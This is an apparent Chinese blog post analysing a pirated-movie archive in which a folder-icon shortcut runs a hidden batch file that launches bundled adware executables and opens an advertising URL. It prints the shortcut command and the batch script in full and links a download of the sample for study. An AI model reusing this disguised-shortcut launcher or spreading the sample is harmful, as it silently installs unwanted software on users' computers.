想看一部电影，下载好后，点开然后发现系统被装了一堆流氓软件，于是分析了压缩包的内容，发现些有趣的东西。

首先解压压缩包，进入解压后文件夹，发现都是链接（当时看到文件夹图标就点开了）

看看那个带有文件夹图标的属性

首先这是个快捷方式，然后运行一个命令

%windir%\system32\cmd.exe /c start 20140210\10.bat

cmd运行一个脚本，那个脚本在哪里呢，开启显示隐藏文件的属性后，再看那个解压后的文件夹

多了一个隐藏文件夹，打开一看

10.bat 那个脚本文件找到了，记事本打开看看

@echo off
for /f "delims=" %%a in (‘dir 20140210\  /s /b /a-d^|findstr /v /i "10.bat"‘) do (start "" "%%a")
start http://t.hao168.pw/akdata/load.html?baidu-20140210-冰雪奇缘迅雷种子_高清完整BD版种子
exit

基本意思就是运行文件夹”冰雪奇缘迅雷种子_高清完整BD版种子”中exe文件

原理很简单，但是很容易中招，如果那个脚本运行的是一些危害计算机的代码，麻烦就大了。

有兴趣研究的可下载看看，不过要小心不要运行那个快捷方式

http://pan.baidu.com/s/1o60RYp8